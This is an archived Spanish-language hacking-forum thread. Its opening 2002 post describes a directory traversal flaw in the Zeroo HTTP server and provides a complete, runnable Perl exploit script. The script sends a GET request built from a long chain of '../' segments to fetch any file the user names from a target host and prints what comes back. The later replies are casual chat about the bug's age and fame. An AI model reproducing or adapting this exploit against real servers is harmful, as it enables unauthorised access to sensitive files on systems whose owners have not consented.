PDA

Ver la versión completa : Zeroo Folder Traversal Vulnerability



TseTse
24-11-2002, 17:00
According to the vendor's web page <http://lonerunner.cfxweb.net>, Zeroo is
a "simple, small, portable, fast HTTP server". The server is available for
Windows, and Linux operating systems.

A folder traversal flaw in the server may allow attackers to compromise
sensitive information stored on the server's volume.

#!/usr/bin/perl
use IO::Socket;
$pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
HTTP/1.0\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
if (@ARGV==3) {
$port=$ARGV[2];
} else {
$port=80;
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (!defined($f)) {
$err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
print STDOUT $err;
exit;
}
$f->autoflush(1);
print $f $pkt;
while (defined($line = <$f>)) {
print STDOUT $line;
}
undef $f;

nikos3194
25-05-2009, 23:36
hola Tse Tse

yo estaba buscando info del Web Server Folder Traversal Vulnerability, en la nº2 de las hackxcracks lo comentaban para estudiar el interprete/traductor Unicode en la seccion de CODE-DECODE BUG, x lo que veo es un Servidor HTTP

para eso me utilizaba mejor el WebWeaver xD

saliendo del chiste, ¿el codigo que agregastes es el famoso bug que tiene Zeroo para atacar desde la "carpeta trasnversal" que falla? O_o

pues soy algo novato aun, asi que me cuesta enterder el tema, pero = gracias x la info ;)

PD: la pagina de http://lonerunner.cfxweb.net que agregastes no funciona + :(

j8k6f4v9j
25-05-2009, 23:56
wow! acabas de responder a un post con casi siete años!

Por cierto, ese bug fue muy famoso y hoy día cualquier servidor web que se precie implementa medidas de protección al respecto.

Salu2

clarinetista
26-05-2009, 00:08
Pedazo de record........ desde los albores de Hackhispano......